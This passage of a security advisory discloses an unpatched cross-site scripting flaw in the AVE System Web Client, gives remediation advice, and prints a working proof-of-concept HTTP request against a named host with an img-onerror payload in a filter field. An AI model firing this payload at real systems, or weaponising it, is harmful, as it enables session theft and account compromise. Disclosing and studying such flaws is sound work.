Version: AVE System Web Client Version: 2.1.131.13992
Fixed Version: None
CVE ID: None
Vulnerability Type: Cross Site Scripting (XSS)
AVE Web Client is a lightweight version of AVE Client. It doesn’t have to be installed and can be run in any Web browser (Chrome, IE, Firefox, etc.). It is a thin client designed for basic work with AVE (checking the progress of data reading, generating reports, reading and displaying data).
This module is also intended for outside traders, who need to have a quick overview of customers’ energy consumption, and for end users, who can display only selected data, not complete sets of meter reading data.
Due to insufficient security measures in all input fields within the application, an XSS (Cross-Site Scripting) vulnerability exists.
The causes of the XSS vulnerability stem from processing user input in a way that allows JavaScript execution. For example, if HTML encoding is not applied to input received from users, it should be implemented to prevent providing the browser’s JavaScript engine with tags capable of executing JavaScript.
Additionally, a whitelist should be created for attributes that allow JavaScript execution; otherwise, an attacker could inject and execute JavaScript code.
GET /website/api/GetSchedulerProfiles.rails?_dc=1730446398457&sessionId=e59a5def61a9f6f39d776dad156c852c&schedulerIds=573&filter={"name":"<img src/onerror=prompt(1)>"}&page=1&start=0&limit=50 HTTP/1.1
Host: www.ave-system.com
Cookie:
Sec-Ch-Ua-Platform: "macOS"
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.ave-system.com/website/jsclient/index.html
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example: